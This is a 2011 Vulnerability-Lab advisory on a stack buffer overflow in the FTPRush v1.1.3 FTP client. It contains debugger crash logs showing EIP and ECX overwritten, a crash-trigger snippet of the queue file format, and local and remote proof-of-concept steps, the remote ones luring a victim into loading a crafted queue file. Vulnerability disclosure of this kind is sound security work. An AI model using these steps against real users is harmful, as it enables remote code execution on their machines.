Document Title: =============== FTPRush v1.1.3 - Stack Buffer Overflow Vulnerability References (Source): ==================== http://www.youtube.com/watch?v=Fxr35RAcaUA Release Date: ============= 2011-06-16 Vulnerability Laboratory ID (VL-ID): ==================================== 54 Product & Service Introduction: =============================== As the most up-to-date solution in FTP transfer, FTPRush is not just a fast, reliable, powerful and easy-to-use FTP program for Microsoft Windows, It is a full-featured FXP client with secure SSL/TLS encryption too. It allows you to transfer files from local to server, server to local or server to server. It allows you to fully customize the user interface on-the-fly. It allows you to create your own FTP scripts to do automatic jobs. Operating Systems: WindowsÆ 98/Me/NT4.0/2000/XP/2003/VISTA Tabbed Interface for smooth control over multiple active connections GUI Runtime Customization and Integrated Docking; spice up the look of it all with your own style or favorites such as MS OfficeÆ 2000/XP/2003 Drag-And-Drop files via Explorer-like interface Easiest way to FXP files from one server to another Lightning speed than other FTP clients to download or upload files Built-in Task Manager for you to easily schedule all kinds of jobs. Allows to setting listing/downloading/uploading FTP account individually into One site and switch them automatically On-The-Fly Compression saves your bandwidth Offers FTP MLSD to gives more accurate directory listing and synchronize folders UPnP Port-Mapping enabled FTP client to accepts incoming connections from server Multi-Language support makes the FTP Client easily translatable to your native language if its not already done HTTP Proxy, FTP Proxy, Socks 4 & 5 support; create different proxies and switch between them with a simple mouse click The RushFTP software is one of the most used in the flasher, downloader +fxp scenes & has won several adwards on different famous vendor websites. (Copy of the Vendor Homepage: http://www.ftprush.com/product-ftprush.html) Abstract Advisory Information: ============================== Vulnerability-Lab team discovered a Stack Buffer Overflow Vulnerability on FTPRush, a famous FTP Client/Server Software. A remote attacker is able to overwrite the ECX & EIP. No validation checks are performed on the length of the file endings on transfer. By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code. Vulnerability Disclosure Timeline: ================================== 2010-08-03: Vendor Notification 2010-12-01: Vendor Response/Feedback 2011-06-03: Public or Non-Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A stack based Buffer Overflow Vulnerability is detected on FTPRush Software. By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code. --- Debug Logs --- ... ... ModLoad: 73a30000 73a46000 C:/Windows/SysWOW64/davclnt.dll ModLoad: 73a20000 73a28000 C:/Windows/SysWOW64/DAVHLPR.dll ModLoad: 74d30000 74d3f000 C:/Windows/SysWOW64/wkscli.dll ModLoad: 74d60000 74d69000 C:/Windows/SysWOW64/netutils.dll (10e8.1504): Unknown exception - code 000006ba (first chance) ModLoad: 68e50000 68e9e000 C:/Windows/SysWOW64/actxprxy.dll ModLoad: 6e750000 6e988000 WPDSHEXT.dll ModLoad: 6e750000 6e988000 C:/Windows/SysWOW64/wpdshext.dll ModLoad: 68d90000 68e19000 C:/Windows/SysWOW64/PortableDeviceApi.dll ModLoad: 75980000 759ad000 C:/Windows/syswow64/WINTRUST.dll ModLoad: 74360000 7439f000 SHMEDIA.dll ModLoad: 74360000 7439f000 C:/Windows/SysWOW64/audiodev.dll ModLoad: 6dee0000 6e147000 C:/Windows/SysWOW64/WMVCore.DLL ModLoad: 70d00000 70d3d000 C:/Windows/SysWOW64/WMASF.DLL ModLoad: 72cf0000 72d21000 EhStorAPI.DLL ModLoad: 72cf0000 72d21000 C:/Windows/SysWOW64/EhStorShell.dll ModLoad: 66420000 66442000 C:/Windows/SysWOW64/EhStorAPI.dll (10e8.17c4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0018e700 ebx=00066d50 ecx=00019539 edx=0018e794 esi=7ee81884 edi=00190000 eip=0040f6e9 esp=0018e758 ebp=0018e994 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 *** ERROR: Module load completed but symbols could not be loaded for image00400000 image00400000+0xf6e9: 0040f6e9 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:000> gn (10e8.17c4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=77c187cd esi=00000000 edi=00000000 eip=41414141 esp=0018e338 ebp=0018e358 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 ... ... FAULTING_IP: +487 41414141 ?? ??? EXCEPTION_RECORD: 41414141 -- (.exr 0x41414141) Cannot read Exception record @ 41414141 FAULTING_THREAD: 000017c4 PROCESS_NAME: image00400000 FAULTING_MODULE: 76670000 kernel32 DEBUG_FLR_IMAGE_TIMESTAMP: 4b6bdefa MODULE_NAME: image00400000 ERROR_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden. EXCEPTION_PARAMETER1: 00000008 EXCEPTION_PARAMETER2: 41414141 WRITE_ADDRESS: 41414141 FOLLOWUP_IP: +487 41414141 ?? ??? FAILED_INSTRUCTION_ADDRESS: +487 41414141 ?? ??? IP_ON_HEAP: 41414141 The fault address in not in any loaded module, please check your builds rebase log at /bin/build_logs/timebuild/ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 41414141 CONTEXT: 41414141 -- (.cxr 0x41414141) Unable to read context, Win32 error 0n30 ADDITIONAL_DEBUG_TEXT: Use !findthebuild command to search for the target build information. If the build information is available, run !findthebuild -s ; .reload to set symbol path and load symbols. ; Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[ffffffff] LAST_CONTROL_TRANSFER: from 77c187b9 to 41414141 BUGCHECK_STR: APPLICATION_FAULT_SOFTWARE_NX_FAULT_WRONG_SYMBOLS_FILL_PATTERN_41414141_STACKIMMUNE PRIMARY_PROBLEM_CLASS: SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE DEFAULT_BUCKET_ID: SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE STACK_TEXT: 00000000 image00400000+0x0 STACK_COMMAND: .cxr 41414141 ; kb ; ** Pseudo Context ** ; kb SYMBOL_NAME: image00400000 FOLLOWUP_NAME: MachineOwner IMAGE_NAME: C:/Program Files (x86)/FTPRush/ftprush.exe FAILURE_BUCKET_ID: SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE_c0000005_C:_Program_Files_(x86)_FTPRush_ftprush.exe!Unknown BUCKET_ID: APPLICATION_FAULT_SOFTWARE_NX_FAULT_WRONG_SYMBOLS_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_image00400000 WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/image00400000/1_1_3_0/4b6bdefa/unknown/0_0_0_0/bbbbbbb4/c0000005/41414141.htm?Retriage=1 Followup: MachineOwner ... ... 0018e34c: ntdll!LdrRemoveLoadAsDataTable+49b (77c187cd) 0018e778: image00400000+23d7ea (0063d7ea) 0018e99c: 41414141 Invalid exception stack at 41414141 Debug Logs(ALL): ../Debug/logs.txt Pictures: ../overflow1.png ../overflow2.png ../overflow3.png Proof of Concept (PoC): ======================= This vulnerabilities can be exploited by local & remote by attackers ... Local Attack Way ... 1. Verbinden mit einem beliebigen Server 2. Erweitertes übertragen > Queue als 3. Queue Information > Anpassen 4. Dann über anpassen im Feld der Endungen den String einspeisen 5. EIP & ECX got overwritten by the Attacker Remote Attack Way ... 1. Install & start a FTP Server 2. Let a person with FTPRush connect to the ftp 3. Let him open through queue the PoC transfer-file with the right code segments. 4. PWN THE BOX! 62DF7CEEE7FC46CFA2B1BDB08FF770FD/ Test Queue: 20LokalC:\Users\Rem0ve\Desktop\update-feeds.txt62DF7CEEE7FC46CFA2B1BDB08FF770FD/AAAAAAAAAAAAAAA+ Test Queue: [Platte][Path][File][Settings]+[String].rfq References: Transfer-Queue ../PoC/RushCfg.xml ../PoC/1_1015289700.rfq Solution - Fix & Patch: ======================= N/A Security Risk: ============== A remote attacker is able to overwrite the ECX & EIP. No validation checks are performed on the length of the file endings on transfer. By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code. The security risk of the vulnerability is estimated as critical because of the local/remote execution of arbitrary code. Credits & Authors: ================== Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory